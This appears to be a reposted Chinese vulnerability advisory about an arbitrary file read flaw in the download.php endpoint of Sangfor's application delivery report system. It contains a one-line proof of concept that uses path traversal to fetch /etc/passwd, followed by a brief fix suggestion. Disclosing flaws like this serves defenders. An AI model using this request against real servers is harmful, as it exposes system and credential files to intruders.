深信服应用交付报表系统 download.php 任意文件读取漏洞

武飞扬头像

想要暴富的小林子

2024-04-24 帮助1人

漏洞描述：

深信服应用交付报表系统 download.php文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件。

漏洞利用条件:

download.php文件接口

漏洞影响范围：

应用交付报表系统

漏洞复现：

1、登录页面：

学新通

2.poc：/report/download.php?pdf=../../../../../etc/passwd

学新通

修复建议：

对下载进行严格控制

这篇好文章是转载于：学新通技术网

版权申明：本站部分内容来自互联网，仅供学习及演示用，请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系，请提供相关证据及您的身份证明，我们将在收到邮件后48小时内删除。
本站站名：学新通技术网
本文地址： /boutique/detail/tanhgfcgfj

系列文章

同类精品